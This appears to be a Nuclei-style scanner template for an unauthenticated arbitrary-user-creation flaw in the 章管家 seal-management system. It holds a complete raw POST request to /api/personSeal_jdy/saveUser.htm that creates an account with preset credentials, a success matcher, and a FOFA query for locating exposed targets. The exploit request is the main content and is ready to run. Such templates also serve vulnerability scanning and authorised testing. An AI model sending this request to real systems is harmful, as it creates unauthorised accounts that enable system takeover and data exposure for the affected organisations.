http:
    - matchers:
        - part: body
          type: word
          words:
            - '{"code":200}'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json

          {"op":{},"data":{"mobile":"test666","uid":"14333333333","password":"123456","name":"test666","return_url":"https://www.baidu.com","apisecretkey":"1","_id":"1","mail_address":"123@qq.com"},"b7o4ntosbfp":"="}
id: zhangguanjia-saveUser-User-addition
info:
    author: Superhero
    description: |-
        fofa: body="章管家登录-公章在外防私盖"
        章管家 /api/personSeal_jdy/saveUser.htm 接口处存在任意用户创建漏洞，未经身份验证的远程攻击者可以利用此漏洞创建管理员账户，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
    name: 章管家 saveUser.htm 任意用户创建漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247485967&idx=1&sn=c8998bf0037577ad64d036b9e2ffcd8e&chksm=c267bf3cf510362af8f2adb896a611466e3a1799d0bdd4ca0441abb23177fb3ef1ab4dc04ec8&token=2024266625&lang=zh_CN#rd
    severity: high
    tags:
        - User addition
        - 章管家
        - baidu
